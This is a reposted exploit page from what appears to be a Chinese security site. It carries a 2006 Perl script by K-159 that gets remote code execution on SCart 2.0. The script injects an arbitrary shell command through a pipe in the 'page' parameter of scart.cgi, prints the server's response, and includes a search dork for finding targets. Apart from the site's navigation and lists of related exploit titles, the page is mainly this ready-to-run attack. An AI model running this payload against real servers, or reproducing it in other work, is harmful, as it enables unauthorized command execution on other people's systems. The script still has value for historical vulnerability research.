首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SCart 2.0 (page) Remote Code Execution Exploit
来源:http://advisories.echo.or.id 作者:K-159 发布时间:2006-06-06  

#!/usr/bin/perl
##
# SCart 2.0 Remote Code Execution Exploit
# Bugs Found & code By K-159
#
## base on advisory at http://advisories.echo.or.id/adv/adv32-K-159-2006.txt
#
# echo.or.id (c) 2006
#
##
# usage:
# perl scart.pl <target> </path/> "cmd"
#
# Google Dork : site: scartserver.com
#
# Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc
#
# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
#
use IO::Socket;
use LWP::Simple;

sub Usage {
print STDERR "\n ========================================================= \r\n";
print STDERR " *SCart 2.0 Remote Code Execution Exploit* \r\n";
print STDERR " Bugs Found by K-159 \r\n";
print STDERR " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
print STDERR " Usage: $0 <www.target.com> </path/> \"cmd\" \r\n";
print STDERR "============================================================= \r\n";
exit;
}

if (@ARGV < 3)
{
Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];

print "\n[+] Conecting to $host\n";

my $result = get("http://$host$path/scart.cgi?action=show_page&base= base2.html&page=browse.txt|$command|");

if (defined $result) {
print $result;
}
else {
print "Exploit Failed.\n";
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FunkBoard CF0.71 (profile.php)
·Claroline <= 1.7.6 (include
·LifeType <= 1.0.4 SQL Injec
·Dmx Forum <= 2.1a (edit.php
·aspWebLinks 2.0 Remote SQL Inj
·Linux Kernel < 2.6.16.18 (N
·TinyPHP Forum <= 3.6 (profi
·myNewsletter <= 1.1.2 (admi
·MS Windows XP/w2k3 (Explorer.e
·QBik Wingate 6.1.1.1077 (POST)
·pppBlog <= 0.3.8 (randompic
·Guestex Guestbook 1.00 (email)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved